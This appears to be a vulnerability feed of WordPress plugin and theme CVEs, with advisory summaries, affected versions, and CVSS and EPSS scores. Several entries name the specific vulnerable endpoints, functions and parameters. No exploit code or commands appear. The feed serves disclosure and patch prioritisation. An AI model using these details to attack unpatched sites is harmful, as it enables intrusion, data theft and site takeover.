WordPress

5868 CVEs vendor


CVE-2025-62901 This Week

Stored cross-site scripting (XSS) in WP Microdata WordPress plugin version 1.0 and earlier allows authenticated users or lower-privileged administrators to inject malicious scripts that execute in the browsers of site visitors, potentially leading to credential theft, session hijacking, or malware distribution. The vulnerability stems from improper input sanitization during web page generation. EPSS score of 0.04% indicates low exploitation probability in real-world conditions.

Tags: WordPress, PHP, XSS
Source: NVD
EPSS: 0.0%
CVE-2025-13329 CRITICAL Act Now

Unauthenticated arbitrary file upload vulnerability in File Uploader for WooCommerce (WordPress plugin versions ≤1.0.3) enables remote code execution. Missing file type validation in the 'add-image-data' REST API endpoint allows attackers to upload malicious files to Uploadcare service and retrieve them to the web server, achieving code execution without authentication. Exploitation requires no user interaction or special privileges (CVSS:3.1 AV:N/AC:L/PR:N/UI:N). No public exploit identified at time of analysis.

Tags: RCE, WordPress, File Upload
Source: NVD
CVSS 3.1: 9.8
EPSS: 0.2%
CVE-2025-12898 MEDIUM This Month

Unauthenticated attackers can retrieve sensitive Google API keys from the Pretty Google Calendar WordPress plugin (versions up to 2.0.0) by exploiting a missing capability check in the pgcal_ajax_handler() AJAX function. The vulnerability allows direct read access to configured API credentials without authentication, enabling credential harvesting for downstream API abuse. No public exploit code or active exploitation has been confirmed at time of analysis; however, the low CVSS score (5.3) and very low EPSS percentile (21%) reflect that while the vulnerability is real, real-world exploitation likelihood remains minimal due to the ease of detection and limited direct impact compared to data exfiltration or system compromise.

Tags: Google, WordPress, Authentication Bypass
Source: NVD
CVSS 3.1: 5.3
EPSS: 0.1%
CVE-2025-14151 HIGH This Week

Stored XSS in SlimStat Analytics for WordPress allows unauthenticated attackers to inject malicious scripts via unsanitized 'outbound_resource' parameter in slimtrack AJAX action (versions ≤5.3.2). Injected scripts execute when any user accesses the compromised page, enabling session hijacking, credential theft, or privilege escalation. Affects all installations with publicly accessible AJAX endpoints. No public exploit identified at time of analysis.

Tags: WordPress, XSS
Source: NVD
CVSS 3.1: 7.2
EPSS: 0.2%
CVE-2025-66058 This Week

Missing authorization in PickPlugins Post Grid and Gutenberg Blocks WordPress plugin (versions through 2.3.17) allows attackers to bypass access control restrictions and exploit incorrectly configured security levels, potentially enabling unauthorized access to protected content or administrative functions. The vulnerability stems from broken access control (CWE-862) with no public exploit code confirmed at time of analysis, though EPSS scoring of 0.04% suggests minimal real-world exploitation probability despite the authorization flaw.

Tags: WordPress, PHP, Authentication Bypass
Source: NVD
EPSS: 0.0%
CVE-2025-64355 This Week

DOM-based cross-site scripting (XSS) in Crocoblock JetElements For Elementor plugin versions up to 2.7.12 allows attackers to inject malicious scripts into web pages through improper input neutralization during page generation. The vulnerability affects WordPress sites using this Elementor page builder extension and can enable session hijacking, credential theft, or malware distribution against site visitors. EPSS exploitation probability is low at 0.04%, but the attack vector is likely network-based, requiring no authentication.

Tags: WordPress, PHP, XSS
Source: NVD
EPSS: 0.0%
CVE-2025-64282 Monitor

Authorization bypass in RadiusTheme Radius Blocks WordPress plugin through version 2.2.1 allows attackers to exploit incorrectly configured access control security levels via user-controlled keys, enabling unauthorized access to restricted functionality. The vulnerability is classified as an insecure direct object reference (IDOR) issue affecting the plugin's access control implementation. While no CVSS score is available and EPSS indicates low exploitation probability (0.04%), the vulnerability demonstrates a fundamental authentication design flaw that could permit escalation of privileges within WordPress installations using this plugin.

Tags: WordPress, PHP, Authentication Bypass
Source: NVD
EPSS: 0.0%
CVE-2025-63043 Monitor

Authorization bypass in PickPlugins Post Grid and Gutenberg Blocks WordPress plugin through version 2.3.23 allows attackers to exploit incorrectly configured access control via user-controlled keys, potentially enabling unauthorized access to post content or plugin functionality. The vulnerability is classified as CWE-639 (Authorization Through User-Controlled Key) and presents a low exploitation probability (EPSS 0.04%, 13th percentile) with no public exploit code or active exploitation confirmed at time of analysis.

Tags: WordPress, PHP, Authentication Bypass
Source: NVD
EPSS: 0.0%
CVE-2025-63002 This Week

Sermon Manager for WordPress plugin through version 2.30.0 allows unauthenticated attackers to exploit missing authorization checks to access or modify sermon data due to incorrectly configured access control security levels. The vulnerability stems from CWE-862 (Missing Authorization) and affects all installations running the vulnerable version range. With an EPSS score of 0.04% (13th percentile), real-world exploitation probability is minimal despite the permission-based nature of the flaw.

Tags: WordPress, PHP, Authentication Bypass
Source: NVD
EPSS: 0.0%
CVE-2025-62998 Monitor

WP AI CoPilot plugin for WordPress versions through 1.2.7 exposes sensitive information embedded within sent data, allowing attackers to retrieve confidential details without proper access controls. The vulnerability stems from inadequate handling of sensitive data in communications, classified as information disclosure with an EPSS score of 0.04% indicating low real-world exploitation probability. No public exploit code has been identified at time of analysis.

Tags: WordPress, PHP, AI / ML, Information Disclosure
Source: NVD
EPSS: 0.0%
CVE-2025-62961 This Week

Missing authorization controls in Sparkle FSE WordPress theme versions 1.0.9 and earlier allow unauthenticated attackers to bypass access control restrictions and perform unauthorized actions through exploitable endpoint misconfigurations. This authentication bypass vulnerability, reported by Patchstack security researchers, affects all instances of the Sparkle FSE theme up to version 1.0.9 with low exploit probability (EPSS 0.05%) but represents a direct authorization failure (CWE-862) that could enable unauthorized data access or modification depending on endpoint exposure.

Tags: WordPress, PHP, Authentication Bypass
Source: NVD
EPSS: 0.1%
CVE-2025-62960 This Week

Missing authorization controls in sparklewpthemes Construction Light WordPress theme versions 1.6.7 and earlier allow unauthenticated attackers to bypass access restrictions and access resources that should be protected by role-based access control. The vulnerability stems from incorrectly configured access control security levels, potentially exposing sensitive functionality or data to unauthorized users.

Tags: WordPress, PHP, Authentication Bypass
Source: NVD
EPSS: 0.1%
CVE-2025-60084 HIGH This Week

PHP object injection in PDF for Elementor Forms WordPress plugin (versions ≤6.5.0) enables unauthenticated remote attackers to execute arbitrary code or manipulate application state through unsafe deserialization of user-controlled data. EPSS probability is low (0.06%, 19th percentile), and no public exploit identified at time of analysis. However, the unauthenticated remote attack vector (CVSS AV:N/PR:N) and high confidentiality impact warrant immediate patching for sites using this plugin.

Tags: WordPress, PHP, Deserialization, Code Injection
Source: NVD
CVSS 3.1: 8.6
EPSS: 0.1%
CVE-2025-60083 HIGH This Week

Object injection via unsafe deserialization in PDF Invoice Builder for WooCommerce plugin allows authenticated attackers with low privileges to execute arbitrary PHP code, manipulate application objects, or trigger other malicious actions. Affects all versions through 6.5.0. No public exploit identified at time of analysis, with EPSS probability of 0.07% suggesting minimal real-world exploitation activity despite high CVSS score.

Tags: WordPress, WooCommerce, PHP, Deserialization
Source: NVD
CVSS 3.1: 8.8
EPSS: 0.1%
CVE-2025-60082 HIGH This Week

Object injection via unsafe deserialization in PDF for WPForms plugin (versions ≤6.5.0) enables authenticated attackers to execute arbitrary PHP code or manipulate application state. The CVSS score of 8.8 reflects network-based exploitation with low complexity requiring only low-privileged authentication. EPSS probability of 0.07% (22nd percentile) suggests limited exploitation likelihood. No public exploit code or CISA KEV listing identified at time of analysis, indicating this remains a theoretical risk requiring proactive patching.

Tags: WordPress, PHP, Deserialization
Source: NVD
CVSS 3.1: 8.8
EPSS: 0.1%
CVE-2025-60081 HIGH This Week

Object injection via unsafe deserialization in PDF for Contact Form 7 WordPress plugin (versions ≤6.5.0) allows authenticated attackers to execute arbitrary PHP code or manipulate application state. Attack requires low-privileged user credentials but no user interaction, with network-accessible attack vector. EPSS probability remains low (0.07%, 22nd percentile) and no active exploitation confirmed at time of analysis. Publicly available exploit code exists per Patchstack disclosure.

Tags: WordPress, PHP, Deserialization
Source: NVD
CVSS 3.1: 8.8
EPSS: 0.1%
CVE-2025-60080 HIGH This Week

PHP object injection in PDF for Gravity Forms + Drag And Drop Template Builder (WordPress plugin) versions up to 6.5.0 allows authenticated attackers with low privileges to execute arbitrary code or manipulate application logic via unsafe deserialization. CVSS 7.5 (High) but EPSS probability of 0.07% (22nd percentile) indicates low observed exploitation likelihood. No public exploit identified at time of analysis, and attack requires high complexity (AC:H) with authenticated access (PR:L).

Tags: WordPress, PHP, Deserialization
Source: NVD
CVSS 3.1: 7.5
EPSS: 0.1%
CVE-2025-60078 HIGH This Week

Local file inclusion (LFI) in Task Manager WordPress plugin versions ≤3.0.2 allows unauthenticated remote attackers to read arbitrary files from the server through improper filename control in PHP include/require statements. With a 7.5 CVSS score but only 0.06% EPSS (18th percentile), this represents high theoretical impact with low observed exploitation probability. No confirmed active exploitation (not in CISA KEV) or public exploit code identified at time of analysis. Patchstack security research disclosed this vulnerability affecting the Agence web Eoxia Task Manager plugin.

Tags: WordPress, PHP, LFI
Source: NVD
CVSS 3.1: 7.5
EPSS: 0.1%
CVE-2025-60076 HIGH This Week

Local file inclusion in Ray Enterprise Translation WordPress plugin (versions ≤1.7.1) allows unauthenticated remote attackers to read arbitrary files from the server. CVSS 7.5 HIGH due to network-accessible exploitation with no authentication required. EPSS score of 0.06% (20th percentile) indicates low observed exploitation probability. No active exploitation confirmed (not in CISA KEV); no public exploit identified at time of analysis. Despite high CVSS, real-world risk appears moderate given low EPSS and information disclosure-only impact.

Tags: WordPress, PHP, LFI
Source: NVD
CVSS 3.1: 7.5
EPSS: 0.1%
CVE-2025-60071 HIGH This Week

Local file inclusion in Riode WordPress theme versions up to 1.6.23 allows remote attackers to read arbitrary files on the server through improper PHP file inclusion controls. The vulnerability requires user interaction (UI:R) but no authentication (PR:N), enabling unauthorized access to sensitive configuration files, credentials, or source code. EPSS score of 0.06% (18th percentile) indicates low observed exploitation probability; no public exploit identified at time of analysis and not listed in CISA KEV.

Tags: WordPress, PHP, LFI
Source: NVD
CVSS 3.1: 8.1
EPSS: 0.1%
CVE-2025-53436 HIGH This Week

Local File Inclusion (LFI) in BZOTheme Monki WordPress theme versions through 2.0.5 allows unauthenticated remote attackers to include and execute arbitrary PHP files on the server, potentially leading to remote code execution, information disclosure, or complete system compromise. Despite the high 8.1 CVSS score, real-world exploitation probability remains low (EPSS 0.17%, 38th percentile) with no confirmed active exploitation or public exploit code identified at time of analysis. The vulnerability stems from improper filename validation in PHP include/require statements, classified as CWE-98.

Tags: WordPress, PHP, LFI
Source: NVD
CVSS 3.1: 8.1
EPSS: 0.2%
CVE-2025-11369 MEDIUM This Month

Gutenberg Essential Blocks plugin for WordPress up to version 5.7.2 allows authenticated authors and above to access sensitive API keys for Instagram, Google Maps, and other external services due to missing capability checks on several callback functions. The vulnerability requires WordPress Author-level or higher privileges and carries a low real-world risk given the constrained attack surface and low EPSS score of 0.04%, though it does expose plaintext credentials to a wider internal threat model than intended.

Tags: WordPress, Authentication Bypass
Source: NVD
CVSS 3.1: 4.3
EPSS: 0.0%
CVE-2025-68071 MEDIUM This Month

Authorization bypass in Essential Real Estate WordPress plugin versions through 5.2.9 allows authenticated users to access sensitive real estate data they should not have permission to view through user-controlled key manipulation. The vulnerability exploits incorrectly configured access control at the application level, enabling privilege escalation from a standard user account to view confidential information such as property details or pricing. No public exploit code has been identified, and the EPSS score of 0.04% indicates low exploitation probability despite the CVSS 6.5 severity rating.

Tags: WordPress, PHP, Authentication Bypass
Source: NVD
CVSS 3.1: 6.5
EPSS: 0.0%
CVE-2025-68070 MEDIUM This Month

Stored cross-site scripting (XSS) in VK Google Job Posting Manager WordPress plugin versions up to 1.2.22 allows authenticated users with low privileges to inject malicious scripts that execute in the context of other users' browsers, potentially compromising site administrators. The vulnerability requires user interaction (clicking a link or viewing a malicious page) to trigger payload execution and affects the plugin's web page generation functionality. EPSS probability of exploitation is notably low at 0.04%, suggesting this is primarily a theoretical risk without documented active exploitation.

Tags: WordPress, PHP, XSS
Source: NVD
CVSS 3.1: 6.5
EPSS: 0.0%
CVE-2025-68056 HIGH This Week

SQL injection in LambertGroup LBG Zoominoutslider WordPress plugin versions ≤5.4.4 enables authenticated attackers with low privileges to execute arbitrary SQL commands with potential for cross-site impact. The vulnerability carries an 8.5 CVSS score but shows low real-world exploitation probability (EPSS 0.04%, 14th percentile) with no confirmed active exploitation or public proof-of-concept code identified at time of analysis.

Tags: WordPress, PHP, SQLi
Source: NVD
CVSS 3.1: 8.5
EPSS: 0.0%
CVE-2025-67912 MEDIUM This Month

Stored cross-site scripting (XSS) in Premio Stars Testimonials WordPress plugin versions 3.3.4 and below allows authenticated users to inject malicious scripts that execute in the context of other users' browsers, potentially compromising site administrators or visitors. The vulnerability requires user interaction (UI:R) and authenticated access (PR:L), limiting immediate risk, but the stored nature means injected payloads persist and affect multiple users. No public exploit code or active KEV status is documented, though the 6.5 CVSS score reflects moderate severity when considering cross-site impact.

Tags: WordPress, PHP, XSS
Source: NVD
CVSS 3.1: 6.5
EPSS: 0.0%
CVE-2025-66134 MEDIUM This Month

Missing authorization in NinjaTeam FileBird Pro WordPress plugin versions up to 6.5.1 allows authenticated users to access and modify files they should not have permission to view or edit due to incorrectly configured access control security levels. The vulnerability requires valid user credentials but can lead to disclosure and modification of sensitive files within the plugin's file management interface. EPSS exploitation probability is low at 0.04%, and no public exploit code has been identified at the time of analysis.

Tags: WordPress, PHP, Authentication Bypass
Source: NVD
CVSS 3.1: 5.4
EPSS: 0.0%
CVE-2025-66131 CRITICAL Act Now

Broken access control in Yaad Sarig Payment Gateway for WooCommerce (versions ≤2.2.11) allows unauthenticated remote attackers to bypass authorization checks and gain unauthorized access to payment gateway functions. With CVSS 9.1 (Critical) scoring reflecting network-accessible exploitation requiring no privileges or user interaction, attackers can read or modify sensitive payment data. EPSS score of 0.04% (14th percentile) suggests low observed exploitation probability despite severity. No public exploit identified at time of analysis, though the authentication bypass tag indicates potential for unauthorized transaction manipulation or data exposure in WordPress e-commerce environments.

Tags: WordPress, PHP, Authentication Bypass
Source: NVD
CVSS 3.1: 9.1
EPSS: 0.0%
CVE-2025-66127 MEDIUM This Month

Missing authorization in g5theme Essential Real Estate WordPress plugin version 5.2.9 and earlier allows authenticated users to access or modify restricted resources by exploiting inadequately configured access controls. An attacker with low-privilege WordPress account credentials can leverage the broken access control to view sensitive information and make unauthorized modifications without requiring administrative approval. No public exploit code is currently identified, though the vulnerability is documented in the Patchstack security database.

Tags: WordPress, PHP, Authentication Bypass
Source: NVD
CVSS 3.1: 5.4
EPSS: 0.0%
CVE-2025-66124 MEDIUM This Month

Unauthenticated remote attackers can bypass access controls in ZEEN101 Leaky Paywall WordPress plugin versions up to 4.22.6, gaining unauthorized access to restricted content through incorrectly configured security levels. The vulnerability requires no user interaction and can be exploited over the network, though it is limited to information disclosure (CVSS 5.3, EPSS 0.04%). No public exploit code or active exploitation has been identified at time of analysis.

Tags: WordPress, PHP, Authentication Bypass
Source: NVD
CVSS 3.1: 5.3
EPSS: 0.0%
CVE-2025-64639 MEDIUM This Month

Missing authorization in WP Compress for MainWP plugin versions up to 6.50.17 allows unauthenticated remote attackers to modify plugin settings due to incorrectly configured access control, affecting integrity of compressed content and plugin configuration without requiring authentication or user interaction.

Tags: WordPress, PHP, Authentication Bypass
Source: NVD
CVSS 3.1: 5.3
EPSS: 0.0%
CVE-2025-64634 HIGH This Week

Broken access control in ThemeFusion Avada WordPress theme through version 7.13.2 allows authenticated attackers with low privileges to access functionality improperly constrained by access control lists, potentially achieving full site compromise. With CVSS 8.8 (High) due to network-based access requiring only low-privilege authentication, attackers can achieve high confidentiality, integrity, and availability impact. EPSS probability remains low at 0.06% (18th percentile), and no public exploit identified at time of analysis, suggesting limited immediate exploitation risk despite the high CVSS rating.

Tags: WordPress, PHP, Privilege Escalation, Avada
Source: NVD
CVSS 3.1: 8.8
EPSS: 0.1%
CVE-2025-64632 MEDIUM This Month

Unauthenticated remote attackers can access sensitive sitemap data in Google XML Sitemaps WordPress plugin versions through 4.1.22 due to missing authorization checks on sitemap endpoints. The vulnerability allows unauthorized information disclosure of site structure and indexed pages without requiring authentication or user interaction. While the CVSS score is moderate (5.3), real-world exploitation probability is very low (EPSS 0.04%), suggesting this is primarily an information disclosure risk rather than an active threat.

Tags: WordPress, PHP, Authentication Bypass
Source: NVD
CVSS 3.1: 5.3
EPSS: 0.0%
CVE-2025-64631 MEDIUM This Month

WCFM Marketplace plugin through version 3.7.1 fails to properly enforce authorization controls, allowing authenticated users with limited privileges to cause denial of service or access functionality they should not have. The vulnerability affects the WordPress plugin across all installations through the specified version, exploiting incorrectly configured access control security levels via network-accessible endpoints. With an EPSS score of 0.05% and low real-world exploitation probability, this represents a privilege escalation risk primarily for multi-vendor marketplace administrators.

Tags: WordPress, PHP, Authentication Bypass
Source: NVD
CVSS 3.1: 5.0
EPSS: 0.1%
CVE-2025-64250 MEDIUM This Month

Open redirect vulnerability in wpWax Directorist WordPress plugin versions up to 8.6.6 allows unauthenticated remote attackers to redirect users to arbitrary external websites via crafted URL parameters, enabling phishing attacks. The vulnerability requires user interaction (clicking a malicious link) but has a network attack vector with low complexity. EPSS exploitation probability is very low at 0.04%, and no active exploitation or public proof-of-concept has been identified.

Tags: WordPress, PHP, Open Redirect
Source: NVD
CVSS 3.1: 6.1
EPSS: 0.0%
CVE-2025-64247 MEDIUM This Month

Missing authorization in the WordPress Read More & Accordion plugin (expand-maker) versions 3.5.5.1 and earlier allows authenticated users to access restricted functionality through incorrectly configured access controls, potentially revealing sensitive information. The vulnerability requires user authentication and network access but carries a CVSS score of 6.5 due to high confidentiality impact, though real-world exploitation probability remains low at 0.04% EPSS. No public exploit code or active exploitation has been identified at time of analysis.

Tags: WordPress, PHP, Authentication Bypass
Source: NVD
CVSS 3.1: 6.5
EPSS: 0.0%
CVE-2025-64242 MEDIUM This Month

Inadequately configured access control in Easy Property Listings WordPress plugin versions 3.5.21 and earlier allows authenticated users to access sensitive information they should not be authorized to view. An authenticated attacker with user-level privileges can bypass authorization checks to read property listing data or other restricted content due to missing authorization validation on API endpoints or functionality. EPSS exploitation probability is very low at 0.04%, and no public exploit code has been identified, indicating limited real-world threat despite the authentication-bypass tag.

Tags: WordPress, PHP, Authentication Bypass
Source: NVD
CVSS 3.1: 4.3
EPSS: 0.0%
CVE-2025-54045 MEDIUM This Month

Authenticated users with limited privileges can access search and replace functionality in CM On Demand Search And Replace WordPress plugin (versions up to 1.5.5) due to missing authorization checks on restricted features. An attacker with basic user credentials can perform privileged actions intended only for administrators, affecting data confidentiality through unauthorized content access. This is confirmed as an authentication bypass vulnerability with low real-world exploitation probability (EPSS 0.04%) despite the missing authorization flaw.

Tags: WordPress, PHP, Authentication Bypass
Source: NVD
CVSS 3.1: 4.3
EPSS: 0.0%
CVE-2025-54004 LOW Monitor

Missing authorization in WCFM - Frontend Manager for WooCommerce through version 6.7.24 allows authenticated users with limited privileges to bypass access controls via incorrectly configured security levels, enabling read-only disclosure of sensitive information. The vulnerability requires user interaction and has a low EPSS score (0.03%, 10th percentile), indicating minimal real-world exploitation probability despite the authentication requirement.

Tags: WordPress, WooCommerce, PHP, Authentication Bypass
Source: NVD
CVSS 3.1: 2.6
EPSS: 0.0%
CVE-2025-13794 MEDIUM This Month

Authenticated attackers with Contributor-level access or above can delete or generate featured images on posts they do not own in the Auto Featured Image (Auto Post Thumbnail) WordPress plugin through version 4.2.1, due to a missing capability check in the bulk_action_generate_handler function. The vulnerability requires user authentication and has a CVSS score of 4.3; no public exploit code or active exploitation has been confirmed at the time of analysis.

Tags: Authentication Bypass, WordPress
Source: NVD
CVSS 3.1: 4.3
EPSS: 0.0%
CVE-2025-9116 MEDIUM This Month

Reflected cross-site scripting (XSS) in WPS Visitor Counter WordPress plugin through version 1.4.8 allows remote attackers to inject malicious scripts via the REQUEST_URI parameter, which is output without sanitization in HTML attributes. The vulnerability has a CVSS score of 5.8 and requires user interaction (clicking a crafted link), with exploitation limited primarily to older web browsers due to modern XSS protections. No public exploit code or active exploitation has been identified at the time of analysis.

Tags: WordPress, PHP, XSS
Sources: NVD, WPScan
CVSS 3.1: 5.8
EPSS: 0.0%
CVE-2025-14581 MEDIUM This Month

The HAPPY Helpdesk Support Ticket System WordPress plugin up to version 1.0.9 allows authenticated attackers with Subscriber-level access to submit replies to arbitrary support tickets by bypassing authorization checks on the 'submit_form_reply' AJAX action. The vulnerability stems from missing capability validation before processing ticket replies, enabling low-privileged users to manipulate the 'happy_topic_id' parameter and interact with tickets they do not own or are not assigned to. While the CVSS score of 4.3 reflects low-to-medium severity with integrity impact only, the EPSS percentile of 13% and absence of evidence of active exploitation suggest this is not an immediate critical priority, though it should be patched to prevent unauthorized ticket interference.

Tags: WordPress, Authentication Bypass
Source: NVD
CVSS 3.1: 4.3
EPSS: 0.0%
CVE-2025-14476 HIGH This Week

PHP object injection in Doubly Cross Domain Copy Paste plugin (≤1.0.46) allows authenticated attackers with Subscriber-level privileges to execute arbitrary code via deserialized untrusted input from uploaded ZIP archives. Exploitation requires administrators to explicitly enable Subscriber access. Available POP chains enable code execution, file deletion, and sensitive data retrieval. Attack vector requires low privilege (PR:L) authentication with network accessibility and no user interaction. No public exploit identified at time of analysis.

Tags: PHP, Information Disclosure, WordPress, RCE, Deserialization
Source: NVD
CVSS 3.1: 8.8
EPSS: 0.1%
CVE-2025-14447 MEDIUM This Month

Unauthorized data modification in AnnunciFunebri Impresa WordPress plugin through version 4.7.0 allows authenticated subscribers to reset all plugin options via the missing capability check on annfu_reset_options() function. Attackers with Subscriber-level access can delete all 29 plugin configuration options, reverting the plugin to default state without administrative authorization. No public exploit code or active exploitation has been identified at time of analysis.

Tags: Authentication Bypass, WordPress
Source: NVD
CVSS 3.1: 4.3
EPSS: 0.0%
CVE-2025-14446 MEDIUM This Month

Popup Builder (Easy Notify Lite) plugin for WordPress versions up to 1.1.37 allows authenticated attackers with Subscriber-level access to reset plugin settings to default values due to missing capability checks in the easynotify_cp_reset() function. The vulnerability requires user authentication and does not grant elevated privileges or information disclosure, resulting in a CVSS score of 5.4 (medium severity). No public exploit code or active exploitation has been identified at time of analysis, though the issue poses moderate risk to WordPress installations relying on plugin configuration integrity.

Tags: WordPress, Authentication Bypass
Source: NVD
CVSS 3.1: 5.4
EPSS: 0.1%
CVE-2025-14440 CRITICAL Act Now

Authentication bypass in JAY Login & Register plugin for WordPress versions ≤2.4.01 allows unauthenticated remote attackers to impersonate any site user, including administrators, by exploiting flawed cookie validation in the user-switching function. Attackers require only knowledge of target user IDs to gain complete account access without credentials. No public exploit identified at time of analysis.

Tags: WordPress, Authentication Bypass
Source: NVD
CVSS 3.1: 9.8
EPSS: 0.1%
CVE-2025-13403 MEDIUM This Month

Authenticated attackers with Subscriber-level access can modify tracking settings in the Employee Spotlight WordPress plugin (versions up to 5.1.3) due to missing authorization checks in the employee_spotlight_check_optin() function. The vulnerability allows privilege escalation to perform account integrity modifications that should require administrator approval, affecting all installations of this plugin without patches applied.

Tags: Authentication Bypass, WordPress
Source: NVD
CVSS 3.1: 4.3
EPSS: 0.0%
CVE-2025-14065 MEDIUM This Month

Simple Bike Rental WordPress plugin versions up to 1.0.6 allow authenticated subscribers to retrieve sensitive customer booking data due to missing capability checks on the 'simpbire_carica_prenotazioni' AJAX action. Attackers with subscriber-level access can exfiltrate personally identifiable information including names, email addresses, and phone numbers from all booking records. CVSS 4.3 reflects the moderate severity of unauthorized information disclosure without requiring administrative access.

Tags: Authentication Bypass, WordPress
Source: NVD
CVSS 3.1: 4.3
EPSS: 0.0%
CVE-2025-14074 MEDIUM This Month

Authenticated attackers with Subscriber-level access can duplicate arbitrary WordPress posts via the PDF for Contact Form 7 + Drag and Drop Template Builder plugin (versions up to 6.3.3) due to missing capability checks in the 'rednumber_duplicate' function. This allows disclosure of sensitive content including password-protected and private posts. The vulnerability requires authentication but exploits insufficient privilege validation, creating a post enumeration and information disclosure risk for multi-user WordPress installations. No public exploit code or active exploitation has been confirmed at the time of analysis.

Tags: Authentication Bypass, WordPress
Source: NVD
CVSS 3.1: 4.3
EPSS: 0.0%
CVE-2025-10583 LOW Monitor

WP Fastest Cache Premium plugin versions up to 1.7.4 contain a Server-Side Request Forgery (SSRF) vulnerability in the 'get_server_time_ajax_request' AJAX action that allows authenticated Subscriber-level users to send arbitrary web requests originating from the server, potentially enabling reconnaissance and manipulation of internal services. The free version is unaffected. No public exploit code has been identified at time of analysis, with a very low EPSS score of 0.04% indicating minimal real-world exploitation likelihood despite the authenticated attack vector.

Tags: WordPress, SSRF, Authentication Bypass
Source: NVD
CVSS 3.1: 3.5
EPSS: 0.0%
CVE-2025-14467 MEDIUM This Month

Stored Cross-Site Scripting in WP Job Portal plugin for WordPress up to version 2.4.4 allows authenticated attackers with Editor-level access or higher to inject arbitrary JavaScript into job description fields by exploiting explicit whitelisting of the `<script>` tag in the WPJOBPORTAL_ALLOWED_TAGS configuration. The injected scripts execute when users view affected job listings, enabling session hijacking, credential theft, and other malicious activities. Impact is limited to multi-site installations or sites with unfiltered_html disabled. CVSS score of 4.4 reflects the high privilege requirement (PR:H) and high attack complexity (AC:H), though the vulnerability affects a potentially large number of WordPress installations.

WordPress XSS
NVD
CVSS 3.1
4.4
EPSS
0.1%
CVE-2025-14354 MEDIUM This Month

Cross-Site Request Forgery in Resource Library for Logged In Users WordPress plugin (all versions up to 1.5) allows unauthenticated attackers to perform unauthorized administrative actions including creating, editing, and deleting resources and categories by tricking a site administrator into clicking a malicious link. The vulnerability stems from missing nonce validation on multiple administrative functions. With an EPSS score of 0.02% and low real-world exploitation probability despite the CVSS 4.3 score, this represents a lower-priority vulnerability requiring user interaction and administrative privileges on the target site.

WordPress CSRF
NVD
CVSS 3.1
4.3
EPSS
0.0%
CVE-2025-14344 CRITICAL Act Now

Arbitrary file deletion in Multi Uploader for Gravity Forms (WordPress plugin ≤1.1.7) allows unauthenticated remote attackers to delete any file on the server through insufficient path validation in the plupload_ajax_delete_file function. Exploitation requires no credentials or user interaction. CVSS 9.8 Critical severity reflects network-accessible attack with high impact to confidentiality, integrity, and availability. Low observed exploitation activity (EPSS 0.37%). No public exploit identified at time of analysis.

Path Traversal WordPress
NVD
CVSS 3.1
9.8
EPSS
0.4%
CVE-2025-14170 MEDIUM This Month

Authenticated attackers with WordPress Subscriber-level access and above can modify arbitrary plugin settings in the Vimeo SimpleGallery plugin versions up to 0.2 due to missing authorization checks on the vimeogallery_admin function. The vulnerability allows privilege escalation within WordPress, enabling lower-privileged users to alter plugin configurations they should not have access to. No public exploit code or active exploitation has been identified at the time of analysis.

Authentication Bypass WordPress
NVD
CVSS 3.1
4.3
EPSS
0.0%
CVE-2025-14064 MEDIUM This Month

BuddyTask plugin for WordPress versions up to 1.3.0 fails to enforce capability checks on multiple AJAX endpoints, allowing authenticated subscribers and above to view, create, modify, and delete task boards in any BuddyPress group regardless of membership or group privacy settings. The CVSS 5.4 (Medium) rating reflects confidentiality and integrity impacts limited to group task data with low attack complexity and no user interaction required, though the actual organizational risk depends on BuddyPress deployment scope and task board sensitivity.

Authentication Bypass WordPress
NVD
CVSS 3.1
5.4
EPSS
0.0%
CVE-2025-14032 MEDIUM This Month

Stored Cross-Site Scripting in Bold Timeline Lite WordPress plugin up to version 1.2.7 allows authenticated attackers with Contributor-level access to inject arbitrary JavaScript via the 'title' parameter of the 'bold_timeline_group' shortcode, executing malicious scripts whenever users view affected pages. CVSS 6.4 reflects moderate impact (confidentiality and integrity compromise across trust boundaries); EPSS 0.04% indicates low real-world exploitation probability. No public exploit code or active exploitation confirmed.

WordPress XSS
NVD
CVSS 3.1
6.4
EPSS
0.0%
CVE-2025-13972 MEDIUM This Month

Arbitrary file read in WatchTowerHQ WordPress plugin versions up to 3.16.0 allows authenticated administrators with valid access tokens to read sensitive server files via path traversal in the 'wht_download_big_object_origin' parameter. The vulnerability exploits insufficient path validation in the handle_big_object_download_request function, potentially exposing database credentials and authentication keys. No public exploit code or active exploitation has been confirmed at time of analysis.

Path Traversal WordPress
NVD
CVSS 3.1
4.9
EPSS
0.2%
CVE-2025-13840 MEDIUM This Month

Stored Cross-Site Scripting in BUKAZU Search widget plugin for WordPress allows authenticated attackers with Contributor-level access and above to inject arbitrary JavaScript through the 'shortcode' parameter of the 'bukazu_search' shortcode. The vulnerability affects all versions up to and including 3.3.2 and results from insufficient input sanitization and output escaping. Malicious scripts execute in the context of any user accessing affected pages. EPSS score of 0.04% indicates low real-world exploitation probability despite moderate CVSS 6.4 severity.

WordPress XSS
NVD
CVSS 3.1
6.4
EPSS
0.0%
CVE-2025-13747 MEDIUM This Month

Stored Cross-Site Scripting in NewStatPress WordPress plugin versions up to 1.4.3 allows authenticated attackers with contributor-level or higher privileges to inject arbitrary JavaScript into pages via a regex bypass in the nsp_shortcode function. When site visitors access pages containing the injected malicious shortcode attribute, the attacker's script executes in their browsers, enabling session hijacking, credential theft, or malware distribution. No public exploit code has been identified; EPSS score of 0.04% reflects the requirement for authenticated access and user interaction.

WordPress XSS
NVD
CVSS 3.1
6.4
EPSS
0.0%
CVE-2025-13440 MEDIUM This Month

Premmerce Wishlist for WooCommerce plugin versions up to 1.1.10 fails to enforce authorization checks on the deleteWishlist() function, allowing authenticated Subscriber-level users to delete arbitrary wishlists belonging to other users. The vulnerability stems from missing capability validation rather than authentication bypass; while the CVSS vector indicates unauthenticated access (PR:N), the description specifies Subscriber-level authentication is required, suggesting the vector may reflect the function's accessibility rather than actual authentication bypass. With EPSS of 0.04% and no public exploit code identified, real-world exploitation risk is minimal despite the authorization flaw.

WordPress Authentication Bypass
NVD
CVSS 3.1
5.3
EPSS
0.0%
CVE-2025-13320 MEDIUM This Month

Arbitrary file deletion in WP User Manager plugin versions up to 2.9.12 allows authenticated attackers with Subscriber-level privileges to delete critical files via improper validation of the 'current_user_avatar' parameter when custom avatar functionality is enabled. The vulnerability exploits PHP's filter_input() function's handling of array inputs combined with insufficient path validation, enabling a two-stage attack that can facilitate remote code execution by deleting essential files. No public exploit code has been identified at the time of analysis, though the low EPSS score (0.29%) suggests limited real-world exploitation likelihood despite the moderate CVSS rating.

RCE WordPress
NVD
CVSS 3.1
6.8
EPSS
0.3%
